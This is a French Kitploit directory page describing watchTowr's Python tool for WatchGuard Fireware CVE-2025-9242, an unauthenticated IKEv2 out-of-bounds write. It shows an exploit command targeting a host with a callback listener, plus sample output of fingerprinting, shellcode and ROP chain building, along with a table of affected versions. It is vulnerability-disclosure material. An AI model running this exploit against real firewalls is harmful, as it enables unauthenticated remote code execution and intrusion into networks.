Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
watchTowr-vs-WatchGuard-CVE-2025-9242 — Générateur d'artefacts de détection et exploit basé sur Python pour WatchGuard Fireware OS CVE-2025-9242, une vulnérabilité d'écriture hors limites IKEv2 non authentifiée. Automatise la prise d'empreinte de version, la vérification de vulnérabilité, la construction de payload shellcode et l'exécution de chaîne ROP. | Kitploit
Outils/GitHubGitHub/watchtowrlabs/watchtowr-vs-watchguard-cve-2025-9242
Génération de PayloadsAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionExploitation de Binaires
GitHubwatchtowrlabs/watchtowr-vs-watchguard-cve-2025-9242

watchTowr-vs-WatchGuard-CVE-2025-9242

Voir le dépôt
13514il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Générateur d'artefacts de détection et exploit basé sur Python pour WatchGuard Fireware OS CVE-2025-9242, une vulnérabilité d'écriture hors limites IKEv2 non authentifiée. Automatise la prise d'empreinte de version, la vérification de vulnérabilité, la construction de payload shellcode et l'exécution de chaîne ROP.

Partager

watchTowr-vs-WatchGuard-CVE-2025-9242

Générateur d'artefacts de détection pour WatchGuard CVE-2025-9242

https://github.com/user-attachments/assets/097f099b-ba60-4223-adea-04279570460f

Voir notre article de blog pour les détails techniques

Détection en action

python watchTowr-vs-WatchGuard-CVE-2025-9242.py --rhost 192.168.56.102 --rport 500 --lhost 192.168.56.1 --lport 31337 --exploit
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-WatchGuard-CVE-2025-9242.py

        (*) Générateur d'artefacts de détection pour WatchGuard de RCE non authentifiée

          - McCaulay (@_mccaulay) de watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-9242]


[#] Envoi de l'init IKEv2 SA avec transform par défaut
[#] Version du firmware WatchGuard : 12.11.3
[#] Numéro de build WatchGuard : 719894
[+] Le service IKEv2 est vulnérable à CVE-2025-9242 d'après la version 12.11.3 < 12.11.4
[+] Service IKEv2 par défaut trouvé
[#] Vérification de la vulnérabilité du service IKEv2...
[+] Le service IKEv2 est vulnérable à CVE-2025-9242
[#] Construction de la charge utile du shellcode...
[#] Construction de la chaîne ROP...
[#] Envoi de la charge utile d'exploitation vers 192.168.56.1:31337

Description

Ce script tente de détecter si le système d'exploitation WatchGuard est vulnérable à CVE-2025-9242.

Versions affectées

Les versions suivantes de WatchGuard OS sont affectées

Version vulnérableVersion résolue
2025.12025.1.1
12.x12.11.4
12.5.x (modèles T15 & T35)12.5.13
12.3.1 (version certifiée FIPS)12.3.1_Update3 (B722811)
11.xFin de vie

Pour plus d'informations, visitez Vulnérabilité d'écriture hors limites de WatchGuard Firebox iked

Suivez les laboratoires watchTowr

Pour les dernières recherches en sécurité, suivez l'équipe des laboratoires watchTowr

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

Télécharger l’outil